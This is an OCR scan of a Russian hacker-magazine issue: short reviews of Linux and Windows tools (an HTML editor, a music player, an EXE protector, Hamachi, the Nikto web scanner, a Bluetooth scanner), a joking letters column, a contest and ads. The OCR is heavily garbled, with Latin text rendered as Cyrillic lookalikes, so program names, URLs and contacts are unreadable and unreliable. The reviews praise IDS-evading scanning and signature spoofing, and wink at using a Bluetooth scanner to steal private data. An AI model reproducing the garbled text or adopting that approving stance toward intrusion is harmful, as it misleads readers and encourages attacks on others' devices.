Зато среди импортируемых в ЗсгіЬиз форматов мы находим РЬоІозЬор 
РЗЭ, впрочем, без поддержки слоевых эффектов. Но это нельзя ставить 
в упрек разработчикам по вполне очевидным причинам. Ведь ЗсгіЬиз — 
не продукт от АсІоЬе. Зато с ТІРР у ЗсгіЬиз проблем не возникает. 

ЗсгіЬиз основан на библиотеке виджетов ОЕ, а для цветоделения ис- 
пользует библиотеку ШІеСМЗ. Общие впечатления от продукта более 
чем положительные: стабильность, отличный набор функций верстки, 
удобный интерфейс. 



ВІиеІізИ 1.0 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 
Размер (в 1аг.Ьг2): 1.4 Мб 
Ьир://ЫиеІізЬ.орепоІІісе.пІ 
Лицензия: ѲШ ОРІ_ 



Редактор НТМЬкода, созданный на основе библиотеки ОТК+2. Интер- 
фейс его состоит из «табового» движка, файловой панели, панели инстру- 
ментов с рядом вкладок и еще одного, кроме главного, меню — меню со 
сниппетами (короткими фрагментами часто используемого кода). 




В ВІиеІізЬ есть динамическая подсветка синтаксиса. 

Среди интересных функций редактора — ведение проектов, которые вклю- 
чают в себя группы файлов. Есть встроенная проверка правописания. Наст- 
ройка «горячих» клавиш. Благодаря библиотеке ѲпотеѴРЗ можно откры- 
вать для редактирования файлы на удаленной машине (по РТР). Есть неко- 
торый набор мастеров-визардов, которые будут хорошим подспорьем но- 
вичкам в НТМІ_/ХНТМІ_. Можно добавлять в меню внешние браузеры и дру- 
гие программы — для вызова с ними текущего документа на обработку. 
Среди встроенных пресетов — чистящий фильтр-конвертор Тібу. 

В левой панели, кроме файлового менеджера, есть еще две вкладки. С од- 
ной доступны в древовидной форме ключевые слова и справочники, отно- 
сящиеся к НТМІ_, РНР, С332 и РуІЬоп. Оттуда же, например, можно встав- 
лять в документ тэги НТМІ_. 

Удобный во всех отношениях редактор, стоящий в одном ряду с Оиапіа 
РІиз и ТЕА. 

Миіпе 0.8.3 

РОЗІХ (*ВЗР, Ыпих, Зоіагіз...) 

Размер (для Іаг.дг): 752 Кб. 

Ьир://тиіпе.дооеуІіпих.огд 

Лицензия: ОШ ОР1_ 



Этот музыкальный пле- 
ер для Опоте — при- 
мерно то же, что плеер 
атагоК в КОЕ. То есть 
плеер, ориентирован- 
ный на коллекции. Раз- 
ница в интерфейсе и в 
наборе функций. Прог- 
раммы для ѲІМОМЕ бе- 
рут курс на упрощение, 
поэтому Миіпе настоль- 
ко прост, что даже пол- 
зунка прокрутки теку- 
щей композиции в нем 
нет. Или слушаем ее от 
начала до конца, или 
выбираем другую ком- 
позицию. 

Миіпе создан на платформе Мопо, а в качестве звукового движка 
использует Ѳзігеатег. Поддерживает плагины, может скачивать из 
Сети обложки к тем альбомам, которые находятся в коллекции. Уме- 
ет читать изображения, внедренные в тэги формата Ю3ѵ2. 
Коллекция в Миіпе только одна. Она состоит из одних лишь названий 
альбомов. В отличие от атагоК, где все удобно разбито на коллекции 
исполнителей, в свою очередь состоящие из коллекций альбомов. 

При воспроизведении альбома появляется список включенных в него 
композиций. Делать что-либо иное, кроме переключения между ними 
с целью воспроизведения, нельзя. Ни свойства посмотреть, ни что-ни- 
будь еще. Совершенно спартанский интерфейс. 

Итог. Плеер хорош для чайников. Если тебе нужно установить в ка- 
ком-нибудь І_іпих/ѲІ\ЮМЕ-ориентированном офисе музыкальный 
плеер, то трудно отыскать лучшее решение, чем Миіпе. Окно с наз- 
ваниями альбомов предусмотрительно оснащено поисковой строкой, 
так что опасаться чересчур длинного списка нет причин — все равно 
можно быстро найти необходимое. 






ЭоІРіх РакеЗідпег ѵ3.2 

УУІПСІ0ѴѴ5 

Ргееѵѵаге 

Зіге: 1.5 Мб 

ІШр:/Лаке5ідпег.сІоЙіх.пе1 



Если ты внимательно чи- 
таешь раздел «Взлом», то 
для тебя не будет откро- 
вением, что большинство 
приложений легко подда- 
ются взлому. Обычно раз- 
работчики не используют 
какую-либо защиту, а ес- 
ли даже и используют, то 
обычно распространен- 
ную, которая также не да- 



ет желанного результата. Вот почему надо использовать довольно ред- 
кие, но продуманные системы защиты, подход к которым пока еще не 
изучен, а применяемые методы достаточно эффективны. Одна из таких 
систем — ОоІРіх РакеЗідпег. Тулза по особому алгоритму обрабатывает 
исполняемый файл программы и шифрует ее секцию кода, при этом 
часть данных с точки входа переносится в код самой защиты. Все это 
непрерывно прогоняется через метаморф-движок, поэтому код декрип- 
товщика и защиты в целом получается полностью полиморфным. Иначе 
говоря, если одну и ту же программу дважды защитить с помощью ЭоІРіх 
РакеЗідпег, а потом сравнить результат , то 2 защищенных ЕХЕ-файла 
будут сильно различаться. Причем это достигается не только за счет по- 
лиморфного движка, но и генератора мусорных циклов и инструкций, ко- 
торые еще сильнее собьют с толку взломщика. 

В ОоІРіх РакеЗідпег также присутствуют алгоритмы антитрассировки, 
приводящие к зависанию программы при попытке ее отладки. Стоит до- 
бавить, что автоматических средств для снятия этой защиты не сущест- 
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вует, так же как и для определения того, что исполняемый файл был ею 
обработан. В ЕХЕ’шник встраивается одна из подложных сигнатур, выб- 
ранная пользователем, которая в дальнейшем используется для обмана 
файловых анализаторов типа РЕЮ. Оепегіс-распаковщики также пойдут 
лесом из-за функции антитрассировки и технологии «спертых байт». 
Так что мораль сей басни такова: перед релизом своей программы не 
забудь ее прогнать через ОоІРіх РакеЗідпег'ом. Тем более, что програм- 
ма написана одним из наших авторов. 

НатасИі 0.9.9.9 

Кросс-платформенная 

Ргееѵѵаге 

Зіге: 632 Кб (ѴѴіпсІоѵѵз), 316 Кб (Ыпих) 

ѵѵѵѵѵѵ.НатасІіі.сс 



Уникальная утилита, позволяющая легко и непринужденно создавать 
виртуальные частные сети с непрерывным шифрованием трафика. 
В чем заключается ее уникальность? В простоте настройки, которую 
полностью берет на себя управляющий сервер. Для создания закрипто- 
ванного канала пользователи сначала подключаются именно к нему, по- 
лучают необходимые для соединения инструкции и только после этого 
устанавливают коннект между собой. После того как связь налажена, 
дальнейшее посредничество сервера исключается, поэтому трафик не 
передается исключительно между пользователями. 

На практике такой подход выглядит еще проще. После установки 
НатасИі в системе появляется виртуальный сетевой адаптер. А сама 
программа реализована в виде симпатичного окна, во многом напоми- 
нающего современный мессенджер. После регистрации на сервере, для 
которой потребуется не более минуты, тебе будет выдан уникальный 
внутренний ІР (к примеру, 5.0.0.53), а также специальный идентифика- 
тор, по которому другие пользователи могут тебя распознать. Далее ты 
можешь подключаться к различным каналам (или создавать свои 
собственные) и с их помощью безопасно работать с другими клиентами. 
Неважно, какой именно софт будет использоваться (игры, чаты, файло- 
обменники и т.п.), а так как НатасИі все равно установит для них пря- 
мое соединение и непрерывное кодирование данных. Приятный момент 
заключается в том, что работе этой системы не мешают ни ІМАТ'ы, ни 
брандмауэры, ни капризы системного администратора. Версии клиента 
существуют не только под винды (на многих языках, включая, русский), 
но и Ыпих, что вдвойне приятно. 

Пару слов о безопасности. Во время регистрации клиент генерирует па- 
ру ВЗА-ключей (один — публичный, другой — скрытый), которые приме- 
няются для авторизации на сервере. Собственно шифрование данных 
основывается на алгоритмах, применяемых в ІРЗЕС и ЗЗІ_, которые дав- 
но заслужили доверие. Важно заметить, что система находится в посто- 
янном развитии и совершенствовании. Если бета-тестеры находят ка- 
кой-либо баг, разработчики моментально исправляют его, а клиенты ав- 
томатически получают необходимые обновления. 




№кП> 1.35 

Кросс-платформенная 

Ргееѵѵаге 

Зіге: 189 Кб 

ѵѵѵѵѵѵ.сіг^пеѴсобе/пікЩ.зНітІ 

Разработчики программы слукавили, обозвав этот сканер веб-уязви- 
мостей обидным словом «никто». Это очень мощный инструмент, спо- 
собный эффективно сканировать удаленные хосты и проводить слож- 
ные тесты безопасности. В базе программы имеется информация о бо- 
лее чем 3200 уязвимых веб-сценариев, а также 625 ѵѵеЬ-демонов. Инфа 
об уязвимостях оформляется в виде специальных плагинов, что позво- 




ляет расширять базу программы без апдейта самого приложения. 
Скажу больше: І\Шо поддерживает автоматические обновления, поэто- 
му за новыми плагинами даже не придется вручную «залезать» в Сеть. 
Анти-ЮЗ методы — это еще одна фенька N і кіо . Опытные администрато- 
ры нередко устанавливают системы обнаружения вторжения и таким 
образом обламывают разного рода сканирования. В отличие от других 
сканеров, использующих РегІ-библиотеку ЫЬѵѵІіізкег, в ІМікІо не опреде- 
ляется ЮЗ-система. В ядре программы заложены различные зІеаШі-ме- 
тоды, позволяющие замаскировать свою работу под обычные пользова- 
тельские запросы. 

Если возможно, то ІМікІо самостоятельно определит директорию с СОІ- 
скриптами и проверит ее на наличие бажных сценариев. Полноценная 
поддержка прокси (с возможностью авторизации), а также ЗЗІ_-соеди- 
нения при правильном подходе гарантируют твою безопасность. Скла- 
дывается впечатление, что разработчики І\Шо предусмотрели абсолют- 
но все. Так, если веб-сайт требует авторизацию, І\Шо легко сможет 
пройти ее (естественно, зная корректные имя пользователя и пароль). 
Если веб-сервер не найден на стандартном 80 порту, Гѵіікіо попробует 
найти его на любом другом. При этом для увеличения скорости работы 
поддерживается интеграция с птар'ом. Все эти и еще два десятка функ- 
ций действительно впечатляют. Единственный нюанс: для полноценной 
работы І\Шо требуется свежая версия РегГа, модули ЫЕТ::ЗЗІ_еау, 
ЫЬѴѴІіізкег, а также ОрепЗЗЬ (в случае винды — модуль І\ІеІ::ЗЗІ_), если 
требуется поддержка ЗЗЬсоединений. 

АігМадпеІ ВІиеЗѵѵеер 

ѴѴіпсІоѵѵз 

Ргееѵѵаге 

Зіге: 5.89 Мб 

Иир://ѵѵѵѵѵѵ.аігтадпе1.сот/ргосІисгз/Ыиезѵѵеер.ІИт 



Продолжаем тему атаки на ВІиеІооІН-устройства. Сегодня я хочу предс- 
тавить тебе отличный ВІиеІооІП-сканер АігМадпеІ ВІиеЗѵѵеер. Нужен он 
для того, чтобы определить активность близлежащих беспроводных уст- 
ройств, а также список доступных сервисов. Разработчики очень ответ- 
ственно подошли к работе над этой программой. Сейчас существует ог- 
ромное количество дыр в различных телефонах и КПК — многие из них 
мы совершенно напрасно обходим стороной. Уникальность АігМадпеІ 
ВІиеЗѵѵеер заключается в том, что авторам удалось собрать огромную 
подборку информации по уязвимостям и реализовать ее в виде этой за- 
мечательной программы. Да-да, АігМадпеІ ВІиеЗѵѵеер определяет про- 
изводителя конкретного устройства и своими средствами осуществляет 
аудит безопасности. 

Конечно, цель авторов — показать пользователям, насколько защище- 
ны их ВІиеіооіП-устройства. Но кого это волнует? Западные блюджеке- 
ры давно приспособили этот инструмент для своих целей, подкрепляя 
отчеты об атаках приватными фотками и записными книжками голливу- 
дских знаменитостей © 
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ВРАЧ-ТЕРАПЕВТ 
Вскрытие писем провел 
Ог.КІоипіг (тада 2 іпе@геаІ.хакер.ги) 



Ггот: КіпіЬаеѵ Визіа [кіпіЬаеѵ@таіІ.ги] 

ЗиЬ|: Привет всем Хакерам журнала!!! 

Пишу я вам из-за отчаянья. У меня вот какая проблема 
я не могу вылезти на ваш сайт и еще на несколько дру- 
гих сайтов мне всегда пишет: ВасІ Вециезі (ІпѵаІісІ 
Нозіпаппе). Что Делать? Подскажите. Зарание спасибо. 
Ве: Привет, Россия! Выход один - прими раз в день ло- 
ратадин. Тьфу, не то. Я хотел сказать, что выход и 
действительно один - паниковать. Но если ты не хочешь 
тратить свои нервные клетки, плача около компьютера, 
вырывая на себе волосы и посыпая голову пеплом, разг- 
лядывая злополучную надпись Вас! Вециезі, то отдохни. 
Расслабься. Почувствуй себя на берегу теплого-теплого 
моря. Волна приятно накатывает, омывая твои ноги. Ты 
чувствуешь себя спокойно. Спокойно и тепло. Еще спо- 
койнее. На небе светит солнышко. Теплое, но не жар- 
кое. В прозрачной морской воде плещутся маленькие 
разноцветные рыбки. Мягкий песочек красиво рассеи- 
вает солнечный свет. Ты чувствуешь себя спокойно. 
Спокойно и тепло. Ты закрываешь глаза и дремлешь. 
Ты не замечаешь, как из моря поднимаются гигантские 
радиоактивные крабы и маленькие рогатые живоглоты. 
Они подползают все ближе и ближе, хватают тебя за но- 
ги, впиваются гигантскими ядовитыми жвалами, ты кри- 
чишь и... просыпаешься. Перед тобой компьютер, а на 
его экране светится окошко браузера с сайтом Хакер. ру. 
Работающим. Это был всего лишь сон... 

Ггот: зупеіІіеіісз@даІа.пеі 
ЗиЬ|: Креатифф 

Привет редакция моего любимого журнала! Все вы 
просто супер!!! ВСЕ без 

исключения. Журнал самый лучший! В этом сом- 
ненья нет! Мне очень нравится 
рубрика креатифф, особенно рассказы от піго, 
я тут поддался влечению... 
и написал свой рассказ, пожалуста прочитайте 
и скажете что думаете... 

я не претендую что бы он был в креативе, просто 
прочтите и скажите свои мысли для 
меня это очень важно! 

Всем Пока! Вы лучшие! ][акер і Іоѵе уои. 

Ве: Здорово, синтетический мужчина! Ты тоже прос- 
то супер. Просто супермен, прямо скажем! Причем 
супермен не потому, что тоже синтетический и тоже 
носишь трусы поверх штанов, а потому, что ты супер- 
геройски невнимателен к таким мелочам, как авторы 
литературных произведений. Например, Ниро никог- 
да не был падонком и не писал креативы. Он пишет 
Стори, причем в Спец. Креативы обычно пишет 
Майндворк, причем в Хакер. Ты пишешь в Хакер. 
Сейчас я постараюсь осилить твой креатив пол- 
ностью, но пока ничего не обещаю, поскольку про- 
листал его по диагонали. Оформил ты его красиво :). 
Ггот: 121221 [піСКоІаІ_АР @ таіі.ги] 

ЗиЬ|: ***РІ_ЕАЗЕ!! 

Дорогая и всеми уважаемая редакция журнала Хакер, 
пишу я вам от нечего 

делать, потому что какая-то с**а опять прикалыва- 
лась с лифтом(уроды:)). 

Прошу я вас не забыть о моем дебильном письмиш- 
ке, в котором я хочу 

попросить вас передать привет нашему ДОРОГО- 



МУ... лифтеру, ведь ему уже так мало осталось... 
Р.З. Не передадите придется вечно здесь сидеть! 
Ве: Привет, Николас! Может быть, тебя уже нет с на- 
ми, а твое тело уже истлело и похоронено в том дале- 
ком лифте на краю Галактики, но все же я постараюсь 
отчитаться по проделанной работе. Итак, мы прикупи- 
ли у спамеров «базу лифтеров России» и отфорвар- 
дили им по сто раз. Ответ пришел только от главного 
лифчиковеда журнала «Хулиган». Он ничем не может 
тебе помочь, его специализация - женский пол. 
Ггот: Зіг.Апбге [зіг.апсіге @ таіі.ги] 

ЗиЬ|: технология «Бесплатный Интернет» 

Здорова хацкеры! Путешествуя по интернету я часто 
встречал предложения купить некую технологию «Бесп- 
латного Интернета». Что это за технология такая, что она 
из себя представляет и существует ли она вообще? 

Ве: Да, существует и довольно давно. Когда мы были 
молодыми, деревья — большими, солнце — более жар- 
ким и всходило с другой стороны, в мире царствовали 
286-е компьютеры. Вернее, они даже были роскошью. 
А вот Интернет местами был и довольно-таки дорогой. 
Тогда народ активно впаривал друг другу некий файл 
іпеісгаск.сот. Его запускали, но он выдавал какую-то 
ошибку, все глючило, а большая часть данных на дис- 
ке оказывалась уничтоженной. Это сильно удивляло 
пользователей и они, сжимая в потных ручках дискету 
с крэкером Интернета, бежали тестить его к друзьям. 
История повторялась. Шло время, а Технология Бесп- 
латного Интернета все совершенствовалась. Теперь 
эта прога глючила меньше, данные на диске не порти- 
лись, но вот после длительного процесса «крэка» прог- 
рамма-таки вылетала. То ли аЬпогтаІ ргодгат Іегтіпа- 
ііоп, то ли зеек еггог оп бгіѵе с, то ли просто сІІІ какой-то 
не хватало. Более того, по странному стечению обстоя- 
тельств у юзера, желающего сделать свой инет бесп- 
латным, начинали образовываться большие счета за 
исходящий трафик, а со временем его вообще отруба- 
ли от провайдера за распространение то ли вирусов, то 
ли спама, то ли за участие в ООоЗ-атаках. Странно. 
В общем, что я хочу сказать? Несовершенная эта тех- 
нология, ох несовершенная. Но прогресс не стоит на 
месте, так что смело покупай и тестируй эту постоянно 
развивающуюся технологию. 

Ггот: АззаиІІРіТІе & Зсг1рі_ [хаскег@дтаіІ.ги] 
ЗиЬІ: ***хде ХУМ?!!!!! 

Ні-ушки, хакеры! Пишут вам 2 единомышленника 
АззаиІІВіТІе и Зсгі р{_ 

Писец как огорчаете!!! Мы, типа, подписались на "Ха- 
кер", дык вчера палучили журнал наш любимый — 
а там... ХУ МОРА НЕТ! Эта ш [сепзогесі] какой-то — 
"Хакер" и без хумора! Эта фее равно, как если бы 
пришла голая Памелла Андерсон и папрасила бы ее 
жОстко паиметь — а вы бы сказали нет! Мы в полном 
шоке па этому поводу — на 2 минуты даже в оф- 
флайн свалили — а это ш [сепзогесі] какая трагедия!!! 
Зачем нам журнал, если в нем хумора нет?!! Мы ду- 
маем — ладна — пачитаем е-таіі. Дык даже мессаги 
песец какие не тупые — неужели читатели Хакера 
так паумнели? 

ЗЫ: ВЕРНИТЕ ДАНЮ ШАПОВАЛА!! 

ЗЗЫ ({гот АззаиИВіІІе): а за плакат с фрюшным чертом 
пасиба :) Правда мне Зсгі рІ_ обещал люлей накинуть 
за то, что у меня такой есть — а у него нет :Р 

НИБАЛЕЙТЕ, 

Ве: Привет, товарищи алкоголики-некрофилы, ту- 
неядцы, хулиганы и друганы АссаултРайфл и 
Скрипт! Больше всего на свете я люблю читать вот 
такие, искренне проникнутые духом конопли, водки, 
пива «жигулевское московское», портвейна «Три 
Топора» и хлеба с майонезом, письма. Сразу видно, 
что люди пишут с душой. Так вот. Ну нет хумора, ну 
и что? Что вам мешает поржать над кодингом? Нет- 
нет, я не предлагаю Вам расширять сознание даль- 
ше, чем это уже сделано. Просто он тоже полон 
смешных слов. Дамп, сегмент, смещение, отлад- 
чик... приколись, Бивис? Я сказал «отладчик»! © 
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Ггот: Кирилл Куртоф [кигіоШгатЫег.ги] 

8иЬ|: жалоба 

Покупая ваш журнал, я думал в нем куча голых баб 
и программа телепередач на неделю, а когда отк- 
рыл, там какая то хрень про компьютеры! Не могли 
бы вы больше таких обложек не делать, с бабами и 
телевизорами! Какой-нибудь монитор там нарисуйте 
что ли... или программу ТВ побликуйте. И вообще, 
я его так, полистал, хрень полная ! 

Что-нибудь сломать то можно, прочитав ваш журнал? 
У меня получилось сломать, только тот диск, 
который был в комплекте 
! А можно как-нибудь поменять журнал 
(правда без диска) на деньги, хотя бы в пол цены? 
А то у меня тут финансы поют романсы. 



Ве: Прости нас, если сможешь! Дело в том, дядя, 
что мы ударились в черный пиар. Сегодня мы ох- 
ватываем аудиторию компьютерщиков, завтра - 
озабоченных любителей голых баб и телевизоров, 
послезавтра — скрубберщиков-насосчиков, через 
два дня — операторов машинного доения и высо- 
кого давления. Хотя стоп. Сегодня же волшебный 
праздник — Новый год, и добрый дедушка Лозо- 
вский должен исполнить твои желания. Будем 
считать, что ты хорошо вел себя в этом году. Вку- 
шай, чадо! Специально для тебя — программа те- 
лепередач '74 и голая баба. Ыоѵѵ. Наслаждайся. 



19:50 Песня года 
21:00 Голубой огонек 
21:30 В мире животных 
22:30 Ретрошлягер 
23:40 Клуб путешественников 
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30000 РУБЛЕЙ САМЫМ ОТВАЖНЫМ 

Бабло побеждает зло 



ПЕРВЫЙ ПРИЗ —30000 РУБЛЕЙ 
ВТОРОЙ ПРИЗ —17000 РУБЛЕЙ 
ТРЕТИЙ ПРИЗ — 1 3000 РУБЛЕЙ 



Все очень просто! Деньги может получить любой! Без обмана, уже с НДС и НСП, без налога 
на прибыль, с разрешением участвовать в игре всей семье, без ограничений по возрасту. 
Все что от тебя требуется — изобразить логотип Хакера на любой поверхности, 
от собственного лба до крыши Пентагона :).* 



Обязательно сделать фотку своего шедевра, и прислать ее нам в хорошем качестве 
(не менее 1024x768). Наши мега-дизайнеры влегкую пробьют фотомонтажи, т.ч. даже не парьтесь 
нас поиметь :). Акция начинается прямо сейчас, твори и фоткай. Свои фотки присылай на 
30000 @ геаі. хакер. ги. 



*Ахтунг! Эти два варианта уже исполнены нами и в конкурсе не участвуют. 




РІ.АТКОЫ Р700Р 



Абсолютно плоский экран 
Размер точки 0,24 мм 
Частота развертки 95 кГ ц 
Экранное разрешение 1600x1200 
ІІ$В-интерфейс 




іпа Ѵісіогіа 



(005) №-6Ы 1, Ш-27-Ь5 

\ѵ ѵѵ\\т в ѵг ом р.гш 



Москва: АБ-групп (095) 745-5175; Акситек (095) 784-7224; Банкос (095) 128-9022; ДЕЛ (095) 250-5536; Дилайн (095) 969-2222; Инкотрейд (095) 176-2873; ИНЭЛ (095) 742-6436; Карин (095) 956-1158 
Компьютерный салон 5М5 (095) 956-1225; Компания КИТ (095) 777-6655; Никс (095) 974-3333; 0ЛДИ (095) 105-0700; Регард (095) 912-4224; Сетевая Лаборатория (095) 784-6490 
СКИД (095) 232-3324; Тринити Электронике (095) 737-8046; Формоза (095) 234-2164; Ф-Центр (095) 472-6104; ЭЛСТ (095) 728-4060; РІаке (095) 236-992; Рогсе Сотриіегз (095) 775-6655 
ІЗМ (095) 718-4020; Меі]іп (095) 727-1222; ИТ Сотриіег (095) 970-1930; РІ-ЗіуІе Тгабіпд (095) 514-1414; ЭЗИ Сотриіегз (095) 755-8202; ІЛ.ТКА Сотриіегз (095) 729-5255; ЭЛЕКТ0Н (095) 956-3819 
ПортКом (095)777-0210; Архангельск: Северная Корона (8182) 653-525; Волгоград: Техком (8612) 699-850; Воронеж: Рет (0732) 779-339; РИАН (0732) 512-412; Сани (0732) 54-00-00 
Иркутск: Билайн (3952) 240-024; Комтек (3952) 258-338; Краснодар: Игрек (8612) 699-850; Лабытнанги: КЦ ЯМАЛ (34992) 51777; Липецк: Регард-тур (0742) 485-285 
Новосибирск: Квеста (38322) 332-407; Нижний Новгород: Бюро-К (8312) 422-367; Пермь: Гаском (8612) 699-850; Ростов-на-Дону: Зенит-Компьютер (8632) 950-300 
Тюмень: ИНЭКС-Техника (3452) 390-036. 






СІР-510 Ноутбук XI 



ИТ-решения Затзипд для бизнеса 

Не секрет, что многие преуспевающие компании выбрали 
технику Затзипд для построения внутренней информационной 
структуры. Продукты Затзипд помогают добиваться успеха 
в бизнесе как глобальным корпорациям, так и небольшим 
фирмам. Революционные технологии, используемые в наших 
ноутбуках, печатных устройствах и мониторах, позволяют 
Затзипд по праву называться ведущей ИТ-компанией. 






Галерея Затзипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. Информационный центр: 8-800-200-0-400. ѵѵѵѵѵѵ.затзипд.ги. Товар сертифицирован. 




